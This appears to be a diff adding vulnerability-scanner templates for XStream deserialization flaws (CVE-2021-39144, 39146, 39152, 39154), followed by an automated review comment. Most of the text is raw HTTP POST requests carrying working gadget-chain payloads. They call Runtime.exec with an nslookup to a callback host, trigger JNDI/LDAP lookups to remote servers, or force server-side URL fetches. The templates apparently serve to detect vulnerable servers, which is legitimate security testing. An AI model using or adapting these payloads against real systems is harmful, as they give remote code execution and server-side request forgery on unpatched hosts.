||||
<isOneWay>false</isOneWay>
|
||||
</com.sun.xml.internal.ws.client.sei.StubHandler>
|
||||
</entry>
|
||||
</stubHandlers>
|
||||
<clientConfig>false</clientConfig>
|
||||
</databinding>
|
||||
<methodHandlers>
|
||||
<entry>
|
||||
<method reference='../../../databinding/stubHandlers/entry/method'/>
|
||||
<com.sun.xml.internal.ws.client.sei.SyncMethodHandler>
|
||||
<owner reference='../../../..'/>
|
||||
<method reference='../../../../databinding/stubHandlers/entry/method'/>
|
||||
<isVoid>false</isVoid>
|
||||
<isOneway>false</isOneway>
|
||||
</com.sun.xml.internal.ws.client.sei.SyncMethodHandler>
|
||||
</entry>
|
||||
</methodHandlers>
|
||||
</handler>
|
||||
</dynamic-proxy>
|
||||
<string>ldap://{{interactsh-url}}/#evil</string>
|
||||
</java.util.PriorityQueue>
|
||||
</java.util.PriorityQueue>
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "dns"
|
|
@ -0,0 +1,64 @@
|
|||
id: CVE-2021-39144
|
||||
|
||||
info:
|
||||
name: CVE-2021-39144
|
||||
author: pwnhxl
|
||||
severity: high
|
||||
description: All versions until and including version 1.4.17 are affected, if using the version out of the box. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types.
|
||||
reference:
|
||||
- http://x-stream.github.io/CVE-2021-39144.html
|
||||
tags: cve,cve-2021,xstream,deserialization,rce
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/xml
|
||||
Content-Length: 1269
|
||||
|
||||
<java.util.PriorityQueue serialization='custom'>
|
||||
<unserializable-parents/>
|
||||
<java.util.PriorityQueue>
|
||||
<default>
|
||||
<size>2</size>
|
||||
</default>
|
||||
<int>3</int>
|
||||
<dynamic-proxy>
|
||||
<interface>java.lang.Comparable</interface>
|
||||
<handler class='sun.tracing.NullProvider'>
|
||||
<active>true</active>
|
||||
<providerType>java.lang.Comparable</providerType>
|
||||
<probes>
|
||||
<entry>
|
||||
<method>
|
||||
<class>java.lang.Comparable</class>
|
||||
<name>compareTo</name>
|
||||
<parameter-types>
|
||||
<class>java.lang.Object</class>
|
||||
</parameter-types>
|
||||
</method>
|
||||
<sun.tracing.dtrace.DTraceProbe>
|
||||
<proxy class='java.lang.Runtime'/>
|
||||
<implementing__method>
|
||||
<class>java.lang.Runtime</class>
|
||||
<name>exec</name>
|
||||
<parameter-types>
|
||||
<class>java.lang.String</class>
|
||||
</parameter-types>
|
||||
</implementing__method>
|
||||
</sun.tracing.dtrace.DTraceProbe>
|
||||
</entry>
|
||||
</probes>
|
||||
</handler>
|
||||
</dynamic-proxy>
|
||||
<string>nslookup {{interactsh-url}}</string>
|
||||
</java.util.PriorityQueue>
|
||||
</java.util.PriorityQueue>
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "dns"
|
|
@ -0,0 +1,84 @@
|
|||
id: CVE-2021-39146
|
||||
|
||||
info:
|
||||
name: CVE-2021-39146
|
||||
author: pwnhxl
|
||||
severity: high
|
||||
description: The processed stream at unmarshalling time contains type information to recreate the formerly written objects. XStream creates therefore new instances based on these type information. An attacker can manipulate the processed input stream and replace or inject objects, that result in execution of arbitrary code loaded from a remote server.
|
||||
reference:
|
||||
- https://x-stream.github.io/CVE-2021-39146.html
|
||||
tags: cve,cve-2021,xstream,deserialization,rce
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/xml
|
||||
|
||||
<sorted-set>
|
||||
<javax.naming.ldap.Rdn_-RdnEntry>
|
||||
<type>test</type>
|
||||
<value class='javax.swing.MultiUIDefaults' serialization='custom'>
|
||||
<unserializable-parents/>
|
||||
<hashtable>
|
||||
<default>
|
||||
<loadFactor>0.75</loadFactor>
|
||||
<threshold>525</threshold>
|
||||
</default>
|
||||
<int>700</int>
|
||||
<int>0</int>
|
||||
</hashtable>
|
||||
<javax.swing.UIDefaults>
|
||||
<default>
|
||||
<defaultLocale>zh_CN</defaultLocale>
|
||||
<resourceCache/>
|
||||
</default>
|
||||
</javax.swing.UIDefaults>
|
||||
<javax.swing.MultiUIDefaults>
|
||||
<default>
|
||||
<tables>
|
||||
<javax.swing.UIDefaults serialization='custom'>
|
||||
<unserializable-parents/>
|
||||
<hashtable>
|
||||
<default>
|
||||
<loadFactor>0.75</loadFactor>
|
||||
<threshold>525</threshold>
|
||||
</default>
|
||||
<int>700</int>
|
||||
<int>1</int>
|
||||
<string>lazyValue</string>
|
||||
<javax.swing.UIDefaults_-ProxyLazyValue>
|
||||
<className>javax.naming.InitialContext</className>
|
||||
<methodName>doLookup</methodName>
|
||||
<args>
|
||||
<string>ldap://{{interactsh-url}}/#evil</string>
|
||||
</args>
|
||||
</javax.swing.UIDefaults_-ProxyLazyValue>
|
||||
</hashtable>
|
||||
<javax.swing.UIDefaults>
|
||||
<default>
|
||||
<defaultLocale reference='../../../../../../../javax.swing.UIDefaults/default/defaultLocale'/>
|
||||
<resourceCache/>
|
||||
</default>
|
||||
</javax.swing.UIDefaults>
|
||||
</javax.swing.UIDefaults>
|
||||
</tables>
|
||||
</default>
|
||||
</javax.swing.MultiUIDefaults>
|
||||
</value>
|
||||
</javax.naming.ldap.Rdn_-RdnEntry>
|
||||
<javax.naming.ldap.Rdn_-RdnEntry>
|
||||
<type>test</type>
|
||||
<value class='com.sun.org.apache.xpath.internal.objects.XString'>
|
||||
<m__obj class='string'>test</m__obj>
|
||||
</value>
|
||||
</javax.naming.ldap.Rdn_-RdnEntry>
|
||||
</sorted-set>
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "dns"
|
|
@ -0,0 +1,49 @@
|
|||
id: CVE-2021-39152
|
||||
|
||||
info:
|
||||
name: CVE-2021-39152
|
||||
author: pwnhxl
|
||||
severity: high
|
||||
description: The processed stream at unmarshalling time contains type information to recreate the formerly written objects. XStream creates therefore new instances based on these type information. An attacker can manipulate the processed input stream and replace or inject objects, that result in a server-side forgery request.
|
||||
reference:
|
||||
- https://x-stream.github.io/CVE-2021-39152.html
|
||||
tags: cve,cve-2021,xstream,ssrf
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/xml
|
||||
|
||||
<map>
|
||||
<entry>
|
||||
<jdk.nashorn.internal.runtime.Source_-URLData>
|
||||
<url>http://{{interactsh-url}}/internal/</url>
|
||||
<cs>GBK</cs>
|
||||
<hash>1111</hash>
|
||||
<array>b</array>
|
||||
<length>0</length>
|
||||
<lastModified>0</lastModified>
|
||||
</jdk.nashorn.internal.runtime.Source_-URLData>
|
||||
<jdk.nashorn.internal.runtime.Source_-URLData reference='../jdk.nashorn.internal.runtime.Source_-URLData'/>
|
||||
</entry>
|
||||
<entry>
|
||||
<jdk.nashorn.internal.runtime.Source_-URLData>
|
||||
<url>http://{{interactsh-url}}/internal/</url>
|
||||
<cs reference='../../../entry/jdk.nashorn.internal.runtime.Source_-URLData/cs'/>
|
||||
<hash>1111</hash>
|
||||
<array>b</array>
|
||||
<length>0</length>
|
||||
<lastModified>0</lastModified>
|
||||
</jdk.nashorn.internal.runtime.Source_-URLData>
|
||||
<jdk.nashorn.internal.runtime.Source_-URLData reference='../jdk.nashorn.internal.runtime.Source_-URLData'/>
|
||||
</entry>
|
||||
</map>
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "http"
|
|
@ -0,0 +1,84 @@
|
|||
id: CVE-2021-39154
|
||||
|
||||
info:
|
||||
name: CVE-2021-39154
|
||||
author: pwnhxl
|
||||
severity: high
|
||||
description: All versions until and including version 1.4.17 are affected, if using the version out of the box. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types.
|
||||
reference:
|
||||
- https://x-stream.github.io/CVE-2021-39154.html
|
||||
tags: cve,cve-2021,xstream,deserialization,rce
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/xml
|
||||
|
||||
<sorted-set>
|
||||
<javax.naming.ldap.Rdn_-RdnEntry>
|
||||
<type>ysomap</type>
|
||||
<value class='javax.swing.MultiUIDefaults' serialization='custom'>
|
||||
<unserializable-parents/>
|
||||
<hashtable>
|
||||
<default>
|
||||
<loadFactor>0.75</loadFactor>
|
||||
<threshold>525</threshold>
|
||||
</default>
|
||||
<int>700</int>
|
||||
<int>0</int>
|
||||
</hashtable>
|
||||
<javax.swing.UIDefaults>
|
||||
<default>
|
||||
<defaultLocale>zh_CN</defaultLocale>
|
||||
<resourceCache/>
|
||||
</default>
|
||||
</javax.swing.UIDefaults>
|
||||
<javax.swing.MultiUIDefaults>
|
||||
<default>
|
||||
<tables>
|
||||
<javax.swing.UIDefaults serialization='custom'>
|
||||
<unserializable-parents/>
|
||||
<hashtable>
|
||||
<default>
|
||||
<loadFactor>0.75</loadFactor>
|
||||
<threshold>525</threshold>
|
||||
</default>
|
||||
<int>700</int>
|
||||
<int>1</int>
|
||||
<string>ggg</string>
|
||||
<javax.swing.UIDefaults_-ProxyLazyValue>
|
||||
<className>javax.naming.InitialContext</className>
|
||||
<methodName>doLookup</methodName>
|
||||
<args>
|
||||
<arg>ldap://{{interactsh-url}}/CallRemoteMethod</arg>
|
||||
</args>
|
||||
</javax.swing.UIDefaults_-ProxyLazyValue>
|
||||
</hashtable>
|
||||
<javax.swing.UIDefaults>
|
||||
<default>
|
||||
<defaultLocale reference='../../../../../../../javax.swing.UIDefaults/default/defaultLocale'/>
|
||||
<resourceCache/>
|
||||
</default>
|
||||
</javax.swing.UIDefaults>
|
||||
</javax.swing.UIDefaults>
|
||||
</tables>
|
||||
</default>
|
||||
</javax.swing.MultiUIDefaults>
|
||||
</value>
|
||||
</javax.naming.ldap.Rdn_-RdnEntry>
|
||||
<javax.naming.ldap.Rdn_-RdnEntry>
|
||||
<type>ysomap</type>
|
||||
<value class='com.sun.org.apache.xpath.internal.objects.XString'>
|
||||
<m__obj class='string'>test</m__obj>
|
||||
</value>
|
||||
</javax.naming.ldap.Rdn_-RdnEntry>
|
||||
</sorted-set>
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "dns"
|
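Review bot: The lazy-value argument at L2999 is written as `<arg>ldap://{{interactsh-url}}/CallRemoteMethod</arg>`, whereas the near-identical `ProxyLazyValue` gadget in the CVE-2021-39146 template uses `<string>` for the same `args` element (L2602). If `arg` is not a class alias XStream resolves, unmarshalling stops with an unresolved-class error before any lookup happens and the template silently reports negative; confirm against a known-vulnerable instance, or align the element name with L2602. Since the two templates share the same chain and differ mainly in these literals, a short comment in `info` stating why CVE-2021-39146 and CVE-2021-39154 are kept as separate templates would help the next maintainer.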